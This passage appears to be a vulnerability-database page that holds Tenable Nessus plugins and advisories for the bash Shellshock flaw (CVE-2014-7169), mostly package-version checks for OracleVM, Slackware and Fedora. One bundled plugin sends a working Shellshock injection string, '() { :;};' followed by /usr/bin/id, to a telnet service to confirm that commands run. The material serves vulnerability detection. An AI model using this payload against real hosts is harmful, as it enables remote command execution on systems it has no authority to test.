ID ORACLEVM_OVMSA-2014-0021.NASL Type nessus Reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2020-01-02T00:00:00
Description
The remote OracleVM system is missing necessary patches to address
critical security updates :
(CVE-2014-7169) Resolves: #1146322
#
# (C) Tenable Network Security, Inc.
#
# The package checks in this plugin were extracted from OracleVM
# Security Advisory OVMSA-2014-0021.
#
include("compat.inc");
if (description)
{
script_id(78237);
script_version("1.15");
script_cvs_date("Date: 2019/09/27 13:00:34");
script_cve_id("CVE-2014-7169");
script_bugtraq_id(70137);
script_name(english:"OracleVM 3.3 : bash (OVMSA-2014-0021)");
script_summary(english:"Checks the RPM output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote OracleVM host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"The remote OracleVM system is missing necessary patches to address
critical security updates :
- (CVE-2014-7169) Resolves: #1146322"
);
# https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000222.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?dadbd467"
);
script_set_attribute(attribute:"solution", value:"Update the affected bash package.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:bash");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/09/24");
script_set_attribute(attribute:"patch_publication_date", value:"2014/09/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/10/10");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"OracleVM Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/OracleVM/release");
if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM");
if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release);
if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);
flag = 0;
if (rpm_check(release:"OVS3.3", reference:"bash-4.1.2-15.el6_5.2")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "bash");
}
{"cve": [{"lastseen": "2019-05-29T18:13:48", "bulletinFamily": "NVD", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.", "modified": "2018-11-30T21:29:00", "id": "CVE-2014-7169", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169", "published": "2014-09-25T01:55:00", "title": "CVE-2014-7169", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "software", "description": "CVE-2014-6271 and CVE-2014-7169 \u2013 ShellShock\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu, CentOS\n\n# Versions Affected\n\n * Canonical Ubuntu 10.04 LTS that include bash \n * CentOS 6.5 that include bash \n\n# Description\n\nGNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nThe Cloud Foundry project is in the process of checking if Cloud Foundry are vulnerable to remote code execution or other exploits. No exploits have been identified or confirmed yet. The Cloud Foundry project is patching all components that have packaged the vulnerable version of bash.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells prior to 2719.1 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry runtime prior to v186 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry BOSH stemcells prior to 2719.2 have bash executables vulnerable to CVE-2014-7169 \n * All versions of Cloud Foundry runtime v186 and prior have bash executables vulnerable to CVE-2014-7169 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v183 or earlier upgrade to v186 or later and BOSH stemcells 2719.1 or later, which contains the patched version of bash that resolves CVE-2014-6271. \n * The Cloud Foundry Project recommends that BOSH deployments running BOSH stemcells 2719.1 and prior upgrade to BOSH stemcell 2719.2 and higher which contains the patched version of bash that resolves CVE-2014-6271 and CVE-2014-7169. \n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v186 and prior upgrade to Release v187 or later. \n\n# Credit\n\nStephane Chazelas (CVE-2014-6271) and Huzaifa S. Sidhpurwala (CVE-2014-7169)\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n\n# History\n\n2014-Sep-25: Initial vulnerability report published.\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "href": "https://www.cloudfoundry.org/blog/cve-2014-6271-and-cve-2014-7169/", "title": "CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-01-01T06:41:41", "bulletinFamily": "scanner", "description": "The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.", "modified": "2020-01-02T00:00:00", "id": "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/77857", "published": "2014-09-25T00:00:00", "title": "GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77857);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)\");\n script_summary(english:\"Tests environment variable handling.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\n\nport = get_service(svc:\"telnet\", default:23, exit_on_fail:TRUE);\n\nglobal_var rcvdata;\nglobal_var cnt;\nglobal_var two_output;\n\nfunction telnet_callback()\n{\n local_var data, report;\n\n data = _FCT_ANON_ARGS[0];\n\n # Accumulate each byte as it's received.\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d) rcvdata += data[0];\n\n if ( 'Plugin output: 2' >< rcvdata && data[0] == '\\n' )\n {\n two_output = rcvdata;\n return -1;\n }\n\n if ( 'uid=' >< rcvdata && data[0] == '\\n' )\n {\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'id\\' command:\\n' + rcvdata;\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n if (\"login: \" >< rcvdata || 'assword:' >< rcvdata )\n exit(0, \"The remote host is running a telnet server that is not configured to run a shell script on connect, and so it is not affected.\");\n}\n\n# Set up the environment.\ntest_command = \"echo Plugin output: $((1+1))\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntwo_output = NULL;\n\ntelnet_loop();\n\n# Set up the environment.\ntest_command = \"/usr/bin/id\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntelnet_loop();\n\nif (!isnull(two_output))\n{\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'echo Plugin output: $((1+1))\\' command:\\n' + data_protection::sanitize_uid(output:two_output);\n\n security_hole(port:port, extra:report);\n exit(0);\n}\n\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:10:08", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321", "modified": "2020-01-02T00:00:00", "id": "ORACLEVM_OVMSA-2014-0024.NASL", "href": "https://www.tenable.com/plugins/nessus/78239", "published": "2014-10-10T00:00:00", "title": "OracleVM 2.2 : bash (OVMSA-2014-0024)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0024.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78239);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/27 13:00:34\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n\n script_name(english:\"OracleVM 2.2 : bash (OVMSA-2014-0024)\");\n script_summary(english:\"Checks the RPM output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000224.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f04c161\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T06:35:06", "bulletinFamily": "scanner", "description": "New bash packages are available for Slackware 13.0 to fix a security\nissue.", "modified": "2020-01-02T00:00:00", "id": "SLACKWARE_SSA_2014-268-02.NASL", "href": "https://www.tenable.com/plugins/nessus/77878", "published": "2014-09-26T00:00:00", "title": "Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77878);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/05/24 13:12:22 $\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"SSA\", value:\"2014-268-02\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Slackware 13.0 : bash (rebuild for Slackware 13.0 only) (SSA:2014-268-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bash packages are available for Slackware 13.0 to fix a security\nissue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.309194\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45f8fb5f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"3_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"3_slack13.0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T07:07:15", "bulletinFamily": "scanner", "description": "Swapping Florian", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2014-12202.NASL", "href": "https://www.tenable.com/plugins/nessus/78058", "published": "2014-10-06T00:00:00", "title": "Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12202.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78058);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/20 06:13:58 $\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Swapping Florian's unofficial patches for those released by bash\nupstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1c47a82e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.51-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:10:07", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644", "modified": "2020-01-02T00:00:00", "id": "ORACLEVM_OVMSA-2014-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/78238", "published": "2014-10-10T00:00:00", "title": "OracleVM 3.2 : bash (OVMSA-2014-0022)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0022.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78238);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/27 13:00:34\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n\n script_name(english:\"OracleVM 3.2 : bash (OVMSA-2014-0022)\");\n script_summary(english:\"Checks the RPM output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000223.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f4b2b7d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif 